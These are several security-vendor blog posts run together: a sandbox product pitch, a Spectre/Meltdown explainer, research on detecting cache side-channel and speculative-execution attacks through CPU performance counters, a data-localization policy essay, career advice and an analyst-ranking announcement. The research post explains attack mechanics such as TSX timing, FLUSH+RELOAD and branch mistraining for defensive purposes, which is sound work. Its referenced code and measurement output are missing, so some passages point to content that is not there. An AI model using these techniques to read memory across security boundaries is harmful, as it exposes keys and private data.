Enter Endgame Arbiter®, a cloud-based threat analysis platform that automates advanced attack analysis, such as determining file reputation or attack type, to reveal unknown threats across the entire enterprise. For any alert, Arbiter conducts robust analysis consisting of first party intelligence, algorithmic and third-party reputation checks. Arbiter also makes a near-real-time decision about the severity of an alert and funnels that information back into the Endgame UI, giving the analyst the necessary additional information required to take the next steps in the triage process.

Problem: Data is Left Behind

Once a prevention alert occurs, security teams often operate in a "lights out" mode, moving on to other alerts without additional analysis taking place. This ignores a potential treasure trove of post-compromise adversarial behavior that could inform future defenses. Today's adversaries are not easily deterred, and operate in the gaps of enterprise security. While a prevention alert may have stopped a serious potential compromise, there is no assurance that the attacker won’t try again with different modes of compromise but the same post-compromise behavior. How can this intelligence about what would have happened inform future indicators for broader enterprise analysis?

Solution:

Endgame Arbiter® was built to extract the full lifecycle of the attack and inform future defenses through our malware detonation and analysis sandbox. Proprietary introspection software analyzes the detonation of a malicious file in a safe, contained environment managed by Endgame. In a few minutes, indicators are extracted for quick pivoting through Endgame Artemis® to determine the full extent of the breach. Arbiter goes well beyond IOC extraction by also looking for the characteristics of attack, similar to the tradecraft protections in the autonomous Endgame agent protecting against targeted attacks.

Problem: Playing Nicely with Others

Security stacks constantly evolve. New products are continually added (and hopefully removed), new integrations must be built, requiring new training and workflows, and it never ends. Security teams need products that not only fit into current and future workflows, but also actually enhance workflows instead of forking the process into YAT (yet another tool).

Solution:

Endgame Arbiter®  was designed to integrate with  the constantly expanding security stack and the ever expanding set of issues. When a new security product detects new problems, it can easily integrate with Endgame Arbiter®. If a file is detected in another solution, Arbiter's upload feature extends the analysis capabilities beyond the alerts in the Endgame platform.

Endgame Arbiter®

Arbiter is another example of how the Endgame platform leverages technology to augment, facilitate and expedite the workflow for security teams.  It was built to smartly inform alert responses and remediation, while also gathering intelligence that is often cast aside, and ensuring interoperability as the security stack evolves.  We  aim to deliver the best possible product and workflow to solve our customer’s key pain points. Endgame Arbiter® contains custom-built, proprietary technology, with many benefits including:

• A sandbox built on top of a hypervisor, allowing us to stop many sandbox evasion techniques that focus on common sandbox indicators.
• A sandbox that only reports the true execution of the malicious behavior. Many other sandboxes “trace” and entire operating system or an entire tainted process instead of just the malicious pieces that were introduced.
• A sandbox that accurately represents enterprise environments. Many sandboxes still utilize Windows XP. Instead, we control the OS for detonation to better mimic real-world environments.
• Accurate IOC extraction. Our sandbox outperforms commonly available sandboxes.
• Easy integration with Endgame developed tradecraft analytics.
• Data protection as the ultimate endgame. Endgame Arbiter® never provides files to any third-party sites or shares information with others. Our technology ensures the best possible analysis with complete control of the data. ​

Endgame consistently delivers Scope, Speed, and Skills with every new feature. Arbiter exemplifies these three values.

• Scope: Dynamic analysis beyond the traditional IOC detection, digging deep into the tradecraft techniques found in the MITRE ATT&CK™ Matrix.

• Speed: Seamless platform integration provides near-instant answers to security teams’ questions like "should I investigate this alert" and "what WOULD have happened if this file ran" in time to stop damage and loss.

• Skills: Not every organization can afford to staff a malware analyst. Endgame Arbiter® can augment those teams by providing automated malware analysis. Arbiter also accelerates analysis for teams with the skilled personnel..

The addition of Arbiter to the Endgame platform accelerates and elevates our users beyond anything else in the market.

A newly released processor vulnerability has quickly sparked the first major security panic of 2018. With terms like Kernel page table isolation, speculative execution, and cache timing, it is difficult to grasp the full implications of this vulnerability. Mix in names like Meltdown and Spectre and there is even more information to digest and understand before making an educated decision to patch, not patch, or burn down your data center. This post wrangles this whirlwind and breaks down the major components of the Spectre and Meltdown vulnerabilities.

Enterprise Compatibility

But first, let’s talk about the elephant in the room. Patches released by Microsoft today sparked concerns over how the updates impact speed and functionality of processors, as well as (in)compatibility with antivirus products. These patches do not impact the Endgame agent in any way, including our unique protections like Endgame’s hardware assisted control flow integrity (HA_CFI). In addition, Endgame does not interfere with patches being applied across the enterprise. Customers will see no performance impact after applying these patches. Patch away!

Making Sense of It All

So what does all of this talk of Spectre, Meltdown, and processor chips really mean? Modern processing architectures are highly optimized and parallelized. To achieve this level of efficiency, Intel, AMD, ARM have invested heavily into designs which order operations in the most cost effective way possible. These operations are part of a cycle that fetches memory, executes machine instructions, and caches frequently used data. Properly optimizing this cycle can lead to upwards of 30% performance improvements, without needing a higher clock frequency.

Unfortunately, this optimization comes at a price. Yesterday, multiple researchers revealed a significant side effect to this optimization at the chip level. With enough time, and the ability to measure time at microsecond frequency, memory can be read regardless of existing security boundaries in the hypervisor, operating system kernel, or user processes such as a web browser. These types of attacks fall into a category we call side-channel attacks.

This vulnerability is significant because critical private data, such as encryption keys, passwords, and cookies, could potentially be stolen from unprivileged processes or across domain boundaries. For example, and hypothetically, during malvertising campaigns, a  malicious ad could lead to theft of the cookies and private data of the web user. Alternatively, a cloud hosted Linux system could hypothetically steal ssh keys from a completely different virtual machine on the same host.

Google's Project Zero technical post outlines several proof-of-concept attacks they call Variant 1, 2, and 3 (CVE-2017-5753, CVE-2017-5715, CVE-2017-5754), where Variant 1 and 2 are also known as Spectre, while Variant 3 is known as Meltdown. These posts and their research papers provide exceptional detail and are recommended reading for the technical intricacies of these vulnerabilities. However, it is important to point out that Spectre affects Intel, ARM, and AMD processors while Meltdown seems to only affect Intel CPUs.

Assuming Breach

Given the omnipresence of this vulnerability in virtually all machines, it is essential to focus on post-compromise responses instead of hoping for the best. Endgame’s protections apply across the breadth and width of the MITRE ATT&CK Matrix, and therefore provide holistic coverage against a range of delivery mechanisms, including those in these attacks. Although the definitive protection will occur once Intel updates their processors, Endgame’s multi-layer approach is well-positioned to stop a targeted attack leveraging these new exploits before damage and loss.

For several years, security researchers have been working on a new type of hardware attack that exploits cache side-effects and speculative execution to perform privileged memory disclosure. Last week, a blog post by Jann Horn of Google and the release of two whitepapers by multiple researchers set off a frenzy of public panic and speculation. These new vulnerability classes consisted of two distinct flaws named Spectre and Meltdown. Given the impact and technical challenge inherent within these vulnerabilities, we quickly dove into the details to investigate potential detection and prevention strategies to ensure the Endgame product is robust against these new kinds of hardware attacks.

Over the years, our research in vulnerabilities has shaped our exploit prevention strategy. Inspired by the groundbreaking works of Yuan et al and Anders Fogh, CPU performance counters for security policy enforcement is at the core of this strategy.  Based on their research and our experience in CPU performance, we hypothesized that many hardware and software flaws can be detected using a combination of heuristic-driven interrupts and instruction sequence verification based on these hardware counters. We presented our work in 2016 at BlackHat USA, and subsequently integrated our HA-CFI approach into the Endgame platform.

This post summarizes our current research into detecting side-channel and speculative execution attacks, which remains ongoing as we continue to learn more about attacks like Spectre and Meltdown. Just as we are inspired by the number of researchers that have contributed findings on hardware attacks, we hope to similarly stimulate conversations about promising defensive measures for these new classes of vulnerabilities that are likely to exist for years to come.

Basics of Performance Counters

All processors affected by Spectre and Meltdown provide flexible mechanisms for counting hardware events such as cache flushes and branch mispredictions. There are dozens of events available and processors can be programmed from the kernel to monotonically count events with near-zero overhead. Additional features exist to generate an interrupt when counters reach a limit giving us the ability to perform additional analysis.

Because these resources are handled completely in the CPU, they are naturally cross-platform and fundamentally the same on Linux, Windows, and macOS. They also exhibit very low performance overhead. This is why we chose to use them for control-flow integrity, and why they are an exciting opportunity for detecting attacks like Spectre and Meltdown on all operating systems.

Basics of Spectre and Meltdown Defense

Spectre and Meltdown require two fundamental capabilities to work: speculative execution and cache side-channels. From a defensive perspective, we focus on each of these capabilities independently, breaking them down to determine if we can find strong correlations between an active attack and the hardware performance counters.

The table below adds additional context to each attack variant that we will reference throughout this post.

The ability to manipulate and measure various processor caches is critical to reliable exploitation.Speculative execution causes a side effect that enables memory disclosure when combined with these cache attacks. The remainder of this post details several of our initial findings for detecting these kinds of attacks.

Detecting Cache Timing Attacks With TSX Counters (Meltdown#1, Meltdown#2)

Transactional Synchronization Extensions (TSX) are a set of instructions provided on Intel processors for efficient synchronization of threaded execution. TSX has its own exception handling which eliminates the overhead of software exception handling performed by the operating system. These extensions are available in Skylake and newer microarchitectures and have proven to significantly speed up practical side-channel attacks. At BlackHat USA in 2016 Yeongjin Jang, Sangho Lee and Taesoo Kim presented a successful attack against Linux, Windows, macOS, and Amazon EC2. Our work leverages an example implementation of their work named kaslrfinder, that targets the Windows 10 kernel.

All cache timing attacks measure subtle timing differences between subsequent accesses to cache lines. Shorter access times imply that the CPU has recently worked with data belonging to that cache line. In most cases, the attack first records a start time using high resolution timers like RDTSC/RDTSCP, although these instructions are not strictly necessary. It then probes an unknown address and handles the exception. By measuring the time again, the attacker can discover differences in timing and identify unmapped/mapped/non-executable/executable pages in memory. The following code block demonstrates how to use TSX instructions to capture this temporal gap:

This compiles to the following instructions.

TSX bypasses traditional try/catch C++ exception handling making the timing faster with less jitter. Specifically, the attack relies on the transaction aborting due to accessing the unknown target address. In the above assembly, an access violation during the call will “silently” continue executing at the _xabort label. Fortunately, there are specific counters to track TSX execution and aborts such as RTM_RETIRED.ABORTED. The documentation defines the counter behavior as “the number of times RTM (Restricted Transactional Memory) abort was triggered”.

In our analysis TSX aborts do not occur normally, but do in this type of exploit. We see this clearly by counting RTM_RETIRED.ABORTED system-wide during normal activity and comparing the output to the same test with the kaslrfinder side-channel attack running. The output below is from Intel’s pcm tool.

The results are clear. The RTM_RETIRED.ABORTED counter has a very high signal-to-noise ratio and looks promising.

In a practical implementation to prevent such an attack, you can also set the RTM_RETIRED.ABORTED counter to interrupt on overflow at a high TSX abort rate and compare the results based on process run-time. In initial testing, this is fairly reliable due to the high true-positive rates, eliminating the need for further noise reduction.

Detecting Cache Timing Attacks Using Page Flush Counters (Meltdown#3)

As the previous example demonstrates, attacks can discover memory locations using cache access measurements. With TSX extensions, this can be performed quickly without causing exceptions from the operating system, but TSX extensions are not always available. Without TSX, the attacker must rely on traditional exception handling to perform timing attacks. The following code demonstrates the same attack but instead uses traditional Structured Exception Handling (SEH) on Windows. This approach achieves the same result except much slower due to the additional overhead of handling the access violation by the operating system instead of hardware.

Unlike exceptions in TSX regions, traditional exception handling is serviced by the operating system and generates observable side-effects. We hypothesize that these side effects during an attack would appear anomalous. For instance, when an unprivileged user is attempting to discover virtual addresses in the kernel, the address being probed during the page fault will cross the protected virtual memory boundary between user and kernel memory pages.

We address this attack scenario on Windows by sampling the side effects from the beginning of an unprivileged process execution, and counting the number of times the faulting address is trying to access kernel virtual memory. The side effect we investigate is the ITLB_FLUSH that happens on context switches in the servicing of exceptions. Using the ITLB as our signal is noisy in practice, so we need to identify the kernel address being probed from the unprivileged process. Fortunately, the last branch record (LBR) stack can track interrupts and exceptions with little overhead. Section 17.10.2 of the Intel manual Vol. 3B notes:

"Additional information is saved if an exception or interrupt occurs in conjunction with a branch instruction. If a branch instruction generates a trap type exception, two branch records are stored in the LBR stack: a branch record for the branch instruction followed by a branch record for the exception. If a branch instruction is immediately followed by an interrupt, a branch record is stored in the LBR stack for the branch instruction followed by a record for the interrupt."

The possible steps using ITLB_FLUSH+LBR are as follows.

1. Program the LBR MSRs to store the last exception records containing MSR_LER_TO_LIP.
2. Beginning with process execution, set TLB.ITLB_FLUSH to generate and interrupt when the counter overflows after a threshold of N events.
3. In the ISR, read MSR_LER_TO_LIP and MSR_LER_FROM_LIP records for branching entries attempting to access kernel virtual memory.

Keep in mind that this is a possible heuristic only when an attacker is attempting to disclose kernel memory from userland, and only when using a branch instruction. Unfortunately the Windows kernel does not provide powerful page fault analysis like Linux does so further research is required to use similar approaches for other vectors.

Detecting FLUSH+RELOAD Attacks Using Last-Level-Cache (LLC) UOPS Counting (Spectre #3, Meltdown#1, Meltdown#2, Meltdown#3)

Jann Horn uses a technique from Yarom and Falkner called FLUSH+RELOAD to target memory cache accesses using eviction and load timing. The FLUSH+RELOAD method is particularly powerful because it can be used to leak across execution cores and is necessary to attack cross-vm memory pages. While we did not reproduce Jann's specific attack of the KVM host memory space, we simulated cross-vm and same system attacks using different implementations of FLUSH+RELOAD from the original research paper. The major contribution from Yarom and Falkner is the abuse of the last level cache (L3) in an evict and reload loop to reliably determine memory locations and disclose data.

To determine a defensive solution for FLUSH+RELOAD, we investigated whether an abnormal amount of L3 cache misses could be observed globally across the system, and if the observation indicated a significant deviation from a baseline when performing the attack. Our developer desktop used for testing contains a lot of idle and active processes, which allows us to replicate the technique based on an approximation from the paper. Because we only care about detecting the cache eviction loop, we can simply run the spy program and measure it using performance counters.

Initially, several counters looked promising, but testing has shown MEM_LOAD_UOPS_RETIRED.L3_MISS to have the greatest potential. A UOP is a micro operation responsible for the building blocks necessary during instruction execution. These UOPs can be thought of as small jobs that are highly parallelizable. A retired UOP is one that was valid and finished its task. For MEM_LOAD_UOPS_RETIRED.L3_MISS we count every time the system was asked to load data from the cache but was missed in the LLC.

The suggested steps for using this counter are below. Remember that the LLC is system wide so context switching and rescheduling does not affect our experiment. The assumption in this scenario is that an attacker has crafted their own program that uses FLUSH+RELOAD and is not co-opting a long running process.

1. On program execution, record the current count of UOPs retired with L3 misses.
2. Register an ISR  and program the PMU to overflow on a large threshold.
3. In the ISR, measure the program start time against the threshold and terminate if out-of-range.

The easiest  way to demonstrate the signal and noise is with a simple setup again using Intel's pcm tool. The experiment follows.

1. Start the pcm tool displaying the counter results system wide for 30 seconds.
2. Measure the baseline from the test system.
3. Next run the FLUSH+RELOAD spy tool to execute the attack.
4. Note the increase in L3_MISS UOPs.

Below are the results. The first measurement runs for 30 seconds on my fairly busy Haswell laptop. The second measurement is the same laptop while also running the FLUSH+RELOAD attack.

As the code above demonstrates, there is a large difference in the UOPs missing the L3 cache when performing the side-channel attack. In the future, we may be able to simplify the detection algorithm by calculating a deviation from cycles to l3_misses for a running program.

Detecting Speculative Branch Execution Leaks (Spectre#1, Spectre#2, Spectre#3)

Speculative execution of branch instructions is part of the optimization core of superscalar architectures and applies to all modern CPUs. The Spectre attack abuses this optimization to cause branch mispredictions that load victim values into a cache the attacker can recover through a side-channel. The previous detection strategies focused on cache side-channels, so let's now look at trying to detect abnormal branch speculation. Based on our reading of the Spectre white paper and testing sample code we assume the following.

1. Branch speculation is a constant,unlike TSX aborts.
2. Spectre will correctly predict a target branch N times.
3. Spectre will mispredict the same branch once causing the speculative execution to read out-of-bounds.
4. Side channel measurements will determine the value of the byte using cache line indexing.
5. Due to speculative execution, the mispredicted branch will execute but not retire.

Due to constant branch speculation we assume that we can't simply count events and expect to reduce the noise. We also know through our CFI work that we can cause an interrupt on the mispredicted branch. In that work, we leveraged the last branch records (LBR) to accurately determine the source and destination for CFI protections. We could possibly use the LBR to record the multiple successfully-predicted branches preceding the malicious one. One nice feature of the LBR is the ability to quickly determine if a record was mispredicted or not by testing the MSB or the LBR_INFO MSR.

We perform the four steps below to program the PMU for testing.

1. Set the LBR_FILTER to only record conditional branches from userland.
2. Set up interrupts on each BR_MISP_EXEC.NONTAKEN_CONDITIONAL which includes speculative branches.
3. Install the ISR to analyze the full LBR stack at misprediction when the PMI is delivered.
4. Analyze the LBR in the ISR to determine if a pattern of predicted and mispredicted victim_function locations exists.

Below are the experiment results using this approach when executing the PoC from the Spectre paper, modified to show the address of the targeted conditional branch in victim_function and using  __mfence instead of the timing loop. An asterisk next to an address indicates the entry was mispredicted.

Our hypothesis was partially correct. We expected to see the victim function conditional branch alternate with the conditional training loop branch from the code. However, the LBR is not reliably recording the victim loop and we aren’t sure why. This type of monitoring may be better suited for Precise Event Based Sampling.

While this result needs more experimentation we are hoping for a stronger correlation from the indirect branch method used by Jann and also covered in the Spectre paper. With more exploits to test we are confident we can make more progress using a variation on this approach.

Conclusion

By sharing this information, we hope to further engage the research community and identify multilayered options for defending against Spectre and Meltdown.  This initial research and solutions, while promising, are far from complete. This new class of vulnerability will continue to develop for several years.

As we’ve proven with our HA-CFI prevention, we are committed to operationalizing our research as these attacks evolve, and maintain state-of-the-art protections in the Endgame platform. This situation is no different from investigating other types of exploits. The Spectre and Meltdown vulnerabilities clearly have significant reach. We feel strongly that our approach to protection - and focusing on classes of vulnerabilities instead of each specific CVE as it pops up - serves our customers well against these kinds of attacks and those in the future.

A special thanks to my ENDGAME colleagues Gabriel Landau, Nicholas Fritts, and Andrea Little Limbago for code, review, and thought provoking re-reading of the Intel manual.

Policy and law lag behind technological change. Nowhere is this more obvious than in infosec, where legal and policy frameworks remain mired in Cold War debates despite over two decades worth of high profile cyber attacks and data theft. This is all beginning to change. We are at a significant inflection point where countries are rapidly implementing policies that are dramatically shaping the future of the internet and how business is conducted abroad. Focused on various data protection standards, these frameworks often have little in common and reflect competing perspectives on data privacy, theft, and regulations. Absent a global institution powerful enough to harmonize these competing frameworks, data localization - country-specific data governance frameworks - is a dominant force shaping the future of digital security and privacy.

As countries scramble to catch up with modern technological realities, two major frameworks are gaining traction: the multi-stakeholder model and cyber sovereignty. The multi-stakeholder model advocates for a free, open, secure and global internet based on individual data protection, while cyber sovereignty reflects a government-controlled approach to information security. Countries across the globe continue to adopt their own data protection standards, which fall along a spectrum between these two frameworks. The European Union’s (EU) General Data Protection Regulation (GDPR), which comes into effect in May, epitomizes the push toward individual protections of data, while Russian and Chinese data localization laws reflect government-controlled approaches to data protection. These opposing frameworks continue to diffuse globally, as countries such as Colombia, Brazil, India, Nigeria, and South Korea introduce or adopt local data standards. This post details this break-up of the Internet (aka Splinternet) through the current implementation of these competing data localization approaches, and how they will increasingly pose logistical challenges for corporations. Data localization also has broader strategic implications, impacting geopolitics, democratic and authoritarian institutions, and individual freedoms.

Individual Data Privacy Protection: The GDPR

As we discussed last month, the GDPR introduces a regulatory framework for how companies collect, use, and store individual data. At its core, the GDPR maintains a strong emphasis on individual data protections, which includes personally identifiable data (PII), but extends to content about an individual. Key data protection features within the GDPR are the right to erasure (aka the right to be forgotten), and the right for an individual to access their data and rectify incorrect data.  It is a far-reaching framework that impacts everything from marketing to artificial intelligence to breach notification. Importantly, the GDPR introduces data standards that pertain to data of European Union citizens regardless of where the data is held. Even if a corporation is not headquartered in the EU, but they have data on EU citizens, they must comply with the GDPR.

The EU’s push toward individual data protection and privacy is not surprising in the wake of the increasingly unprecedented magnitude and scope of corporate data breaches. The GDPR also reinforces the values and norms of individual freedoms and humans rights that are foundational to the EU. In this way, data regulation frameworks intersect with and adhere very closely to their native political institutions. The GDPR reflects the political and economic union of 28 democratic members, prioritizing the data protection and individual rights that reinforce democratic institutions. In turn, with the additional emphasis on corporate responses to data breaches, the GDPR advances specific norms for security and privacy within a regulatory framework.
 

Data Localization with Chinese Characteristics

In October, Chinese President Xi Jinping thoroughly detailed his vision of Socialism with Chinese Characteristics that includes internet control to "oppose and resist the whole range of erroneous viewpoints". This emphasis on cyber sovereignty reinforces China’s cybersecurity law which similarly places the government as the protector and manager of online content. According to the law, data localization requirements focus on critical infrastructure businesses and firms with access to personal data. For over a decade, China has demanded foreign corporations turn over data, but this new law tightens the requirements and blacklists corporations who fail to comply. While the definition of critical infrastructure remains vague, the law could undermine foreign intellectual property and the privacy of individual data held by corporations operating in China. The law went into effect in 2017, and is expected to impact those companies leveraging big data the most, greatly increasing data processing costs and logistical challenges for companies. With the larger movement toward AI and the internet of things, this law has farther reaching impact, including on companies such as social media platforms that host web content and websites in China.

The repercussions of China’s data localization extends beyond its own sovereign borders. For instance, China has led several efforts to integrate state internet control requirements into United Nations documents focused on global cyber norms. China also seeks to control Chinese language media and content external to its borders as part of a broader strategy to garner influence abroad. Domestically, China’s emphasis on government control of data has enabled a nascent social credit system that perhaps best personifies the striking repercussions of competing approaches to data protection. Revealed in 2014, China is developing a national system to track and rate the reputations of individuals and businesses. It will increasingly influence all aspects of life, including loan applications, dating profiles, job prospects, airplane ticket purchases, travel, and property ownership. Individuals are scored based on a range of factors such as financial debt, deviation from state-approved online content, and the scores of others within your social networks. Finally, China already blocks several U.S. internet companies, and further assists in domestic development of Chinese competitors. This too has great global impact, as Tencent passed Facebook last year in market capitalization. Tencent also has ten percent stake in Snapchat’s parent company Snap. Other Chinese tech giants such as Alibaba and Baidu continue to expand as well. Although they are not technically state-owned enterprises, these companies influence China’s capabilities for internet and data control, including a dominant role positioning China to emerge as the global leader in AI, and further strengthening localized government control of data.

The Russian model

China and Russia share many similarities in their push for cyber sovereignty and data localization, including a bilateral ‘nonagression pact’ for mutual support of sovereignty and refraining from attacks. Russia is best known for various high profile breaches and a propaganda machine of troll factories and disinformation that seeks to disrupt elections across the globe, divide societies, and weaken democracies. However, there is much more to the Russian approach, including a strict focus on cyber sovereignty to simultaneously control domestic information, expand data localization policies globally, and shape the global digital infrastructure.

In 2015, a new Russian law required all data collected on Russian citizens to be stored and processed on servers in Russia. This law equally applies to countries outside of Russia, and has already resulted in the blocking of websites owned by U.S. companies. Russia’s 2016 information security doctrine outlines its far-reaching approach to information security, including an integration of both the technical and the social and psychological components of digital information control. Russia also requires foreign companies to provide source code for security products as a cost of doing business there. Two pieces of legislation in 2017 further focus on data control, eliminating anonymity online and restricting tools to evade censorship, including VPNs and anonymizers.

Russia has embraced many aspects of China’s internet strategy, working to create its own ‘Great Firewall’ (dubbed the Red Web), and continues to rise in global measures for censorship and surveillance. Whereas China tends to censor content based on keywords and limiting collective expression and congregation, Russian censorship focuses more on cultural control, fostering self-censorship in publications, websites, and media due to nebulous guidelines. Russia often first deploys various forms of Russian information security domestically, such as fostering societal divisions through disinformation, before applying them internationally.

Additionally, as part of the broader effort to leverage data collection for domestic control, Moscow recently introduced a new facial recognition capability within a city-wide camera network. While depicted as a means to capture criminals, it has massive privacy implications and contributes to the ongoing expansion of domestic surveillance. Finally, Russia is actively attempting to shape global information flows. For example, Russia recently provided the infrastructure to expand North Korean internet access, resulting in 60% more internet access thanks to this second connection. Simultaneously, Russia is working to build an independent internet infrastructure among the BRICS countries (Brazil, Russia, India, China, and South Africa), which includes an alternate domain name system. This alternate internet, combined with data sovereignty, is intended to grant Russia greater autonomy and control of digital information.

Boundaries Do Exist on the Internet

Localized data governance will continue to diffuse into 2018 as governments across the globe seek to control digital security within their borders. The European, Chinese, and Russian frameworks reflect various facets of data localization and internet governance, and each is inspiring other countries as they shape their own national frameworks. In 2015, Kazakhstan passed a law similar to Russia’s, requiring data on their citizens to be stored within their boundaries.  Conversely, a Canadian court ruling mirrored a European Court of Justice right to be forgotten case, while the UK’s latest data protection law shares many similarities with the GDPR, as does a recent bill proposed in the U.S. pertaining to data breach notifications. The end of net neutrality in the U.S. and Nigerian support for net neutrality and an open internet further reflect the divides that will continue to shape data localization into 2018.

In each case, the domestic political environment dramatically shapes and reshapes each data localization framework. For instance, Iran’s nascent state-sponsored intranet, the Halal internet, shares similar aims as China’s Great Firewall. However, in response to recent protests, Iranian President Hassan Rouhani noted, “Some imagine that the people only want money and a good economy, but will someone accept a considerable amount of money per month when for instance the cyber network would be completely blocked?” As this quote demonstrates, shifting political environments will likely result in shifting data localization frameworks, not just in Iran but across the globe.

While the GDPR is understandably garnering the most attention due to its May 2018 implementation deadline, countries across the globe are increasingly shaping their own data frameworks for information security. The result is a patchwork of laws and policies that impact corporate data governance as well as individual privacy. Social media companies already experience this with various approaches to online speech, and other multinational corporations are increasingly impacted by various frameworks for data protection, cross-border data flows and privacy. While many of the recent policies reinforce the key tenets of a secure, free, and open internet, authoritarian data localization strikes at these fundamentals and puts internet freedoms, economic security and democracy at risk across the globe.

For many, entering the information security (infosec) industry is elusive and confusing, with mixed signals and conflicting information about what background or skills are required. The reality is that there is no single path into the industry. Despite the monochromatic portrayals of the community in popular culture and media, the infosec community consists of experts from a diverse range of disciplines, experiences, and training. This diversity of backgrounds is a strength which must continue and, importantly, expand to best prepare for and support the future infosec workforce.  

Since we are constantly asked how we entered the field and what steps those seeking to enter the field should take, we compiled our top recommendations below. These recommendations apply to anyone wanting to learn more about the industry, from students preparing to enter the field to someone looking to transition into infosec to someone just wanting to get a taste of infosec and see if it is a good fit. The following should not be viewed as the holistic ‘to-do list’ for getting into infosec, but instead provides several initial recommendations that can be adjusted to meet personal objectives. There is certainly the formal education route. However, given the multidisciplinary nature of infosec, there is no single best route into infosec through formal education, but rather it depends on desired career paths. Instead, we will focus on inexpensive - if not free - recommendations for entering or expanding your skills within the community.

The Three Rs

While many only associate infosec with STEM skill sets, the 3 Rs - reading, writing, and arithmetic (yes, not technically Rs) -  remain invaluable for any introduction into infosec. First, from books to social media sites to websites and blogs, there is a wealth of reading material available at your fingertips. There are numerous compilations of top infosec websites, while social media can be an additional resource for hearing from top influencers and directly asking experts their thoughts on specific concepts or approaches. Second, infosec has a large and active online community of contributors who write on a range of topics. This isn’t just for experts; those who craft their own website and produce their own content stand out for recruiters and improve their personal branding. Finally, and sticking within the theme of 3 Rs, mathematically-inclined people are a natural fit for infosec, which increasingly integrates the tools and methodologies of data science. Data scientists in infosec come from a range of disciplines and quickly provide new ways of approaching security challenges such as anomaly detection and behavioral analytics. Clearly, there are many career paths and options for those who aren’t mathematically-inclined, but the mathematics path offers a logical transition for those who may not have the infosec background, but do have a mathematical background and are interested in how their skills may apply.

Open Source Tutorials

Nothing can replace hands-on experience. Fortunately, there are numerous online resources available for someone just getting their feet wet to mid-career as well as senior folks looking to sharpen or develop complementary skills. Tutorials such as Open Security Training and Lena provide free, online training for people interested in developing new skills across a range of security topics, such as forensics, threat hunting, intrusion detection, and cryptanalysis. If you’re interested in reverse engineering, Endgame’s Amanda Rousseau created online reverse engineering workshops that provide comprehensive training at your own pace. SANS offers online tutorials, including the SIFT workstation to explore open-source forensic and incident response tools across a range of scenarios.  Many conference talks are also recorded and may provide some hands-on opportunities. Finally, building your own home lab is a great way to understand how all of the pieces fit together. If you don’t know where to begin, there are online tutorials and github repos to streamline the process and help you become your own sysadmin and network engineer - skill sets which dramatically improve your understanding of underlying technologies.

Local Conferences

Local conferences arguably provide the best initiation into infosec. Whether attending as a participant or trying out speaking for the first time, local conferences offer a great way to network, learn, and even get hands on experience through workshops and training at the conference.  Better yet, most of these are inexpensive or even free if you can snag a ticket. The BSides series takes place across the U.S. and has expanded internationally as well. Other conferences, such as DerbyCon or ShmooCon, are also great places for job seekers, as sponsors often have tables or booths with hiring authorities and recruiters.  Importantly, these local conferences are also great venues for networking, building friendships and professional relationships, and exchanging ideas in an extremely informal, social atmosphere. There also are scholarship programs at some of national conferences - such as Black Hat and Women in Cybersecurity - that offer great opportunities and an additional means to interact within the community.

Security Challenges

Infosec competitions take many different forms. In general, they may be team-based and focused on achieving specific objectives through real-world scenarios, such as solving a specific problem or defending a network. These occur at all levels and ages, from middle school and high school hackathons to capture the flag (CTF) events at security conferences or company-sponsored events. If you can’t make it to a scheduled competition, the FLARE On Challenge provides a virtual event for individuals to test and hone their skills against some of the best in the community. If you’re in higher education, the National Collegiate Cyber Defense Competition offers another great opportunity for students to test their defensive skills against teams from across the country. Cyber Patriot focuses on middle school and high school students to help them learn more about the industry and how to defend networks, while also providing opportunities to compete regionally and even nationally.

Non-profit Organizations & Meetups

There are numerous non-profit and national organizations whose explicit objective is to help introduce more people into the infosec workforce. There are national organizations such as Girls Who Code, Women Who Code and Black Girls Code who directly aspire to bring more women into the tech workforce, while numerous other groups also seek to diversify and train the workforce. There are also local groups such as Hack the Hood in Oakland and STEMLY in Washington, DC that provide additional networking, training, and professional development focused on low income youth and people of color. Finally, local meetups are a great way to network, learn, and present within your community. They provide an inexpensive - if not free - means to learn more about anything from cloud security to ethical hacking to web application security.

Internships & Apprenticeships

Internships and apprenticeships offer great opportunities to gain on-the-job experience and get a taste for the security industry.  Internships usually are posted in November for the summer (including our own current internship openings!), although some occur at various points throughout the year. A broad range of companies offer security internships, including security vendors, tech companies, and non-profits. Importantly, internships are available for a variety of security positions that do not inherently require experience in infosec, such as design, data science, and all-source analysis. Similarly, apprenticeships offer additional opportunities for exploring careers in infosec. Virginia, Maryland, St. Louis and California are among the growing number of regions where government, academic, and private sector entities have introduced cyber and tech apprenticeship programs. To evaluate your own local job prospects, NIST maintains CyberSeek, a website that tracks local and national supply and demand within the security job market.

There is a well-known workforce shortage in infosec, and it is only expected to expand in the coming years. Of course, organizations bear a responsibility in making careers more accessible, such as through more inclusive job descriptions and recruiting processes. In fact, the federal government recently created cybercareers.gov to expedite recruitment and retention within cybersecurity. And for those interested in the field, we hope a few of these recommendations resonate and help encourage more people, from a broad range of backgrounds, to explore a career in infosec.

I’m excited to share that Gartner has named Endgame a “Visionary” in the 2018 Magic Quadrant for Endpoint Protection Platforms. Gartner initially explored the entire market of endpoint vendors. Of the 21 top vendors included in the final evaluation, Endgame was ranked third on “completeness of vision,” which Gartner defines as the degree to which vendors understand current and future customer requirements, and have a timely roadmap to meet them. This is the first year we’ve been included in this evaluation. Given that Endgame has come further, faster, than most (or all) of the others, I’d like to share here what Endgame is doing, how we came so far so fast, and where we’re going next.

Legacy endpoint protection had a great run, but it’s over.  

Throughout this past year, attackers have continued to execute operations aggressively, often adopting tradecraft and techniques that were once primarily used by nation-state actors. We see increasing use of fileless techniques, custom malware, and legitimate administrative tools in operations targeting companies large and small. This accelerating sophistication of attacks has overwhelmed legacy EPP. Tools that were once important for protecting your enterprise have become little more than check-the-box compliance requirements, offering little real protection. The problem is that security is dynamic – as much person-on-person as machine-on-machine. Legacy tools are built on an outdated vision of attacker behavior: they’re overweight; they’re hard to use; and they have become multi-agent behemoths laboring to stitch together AV, NGAV, exploit protection, IOC search, and IR. It doesn’t work anymore, and the proof is right there for all to see in the steady drumbeat of catastrophic breaches.

There. I’ve said it. Let’s move on.

Endgame has redefined endpoint security. We hired the best attackers from places like the NSA and the Air Force and – in collaboration with top defenders, data scientists, engineers, designers, and incident responders from across the industry – asked them to build the security product they never wanted to encounter when they were conducting missions on behalf of the United States. We listened to CISOs frustrated at juggling dozens of vendor relationships and demanding converged products integrating more functionality into a single agent. We watched operators struggling to use thoughtlessly complex products whose interface and workflow would never have made it off the white board in a consumer product. And we’ve delivered a converged endpoint protection platform that’s easy to use, and that actually works.

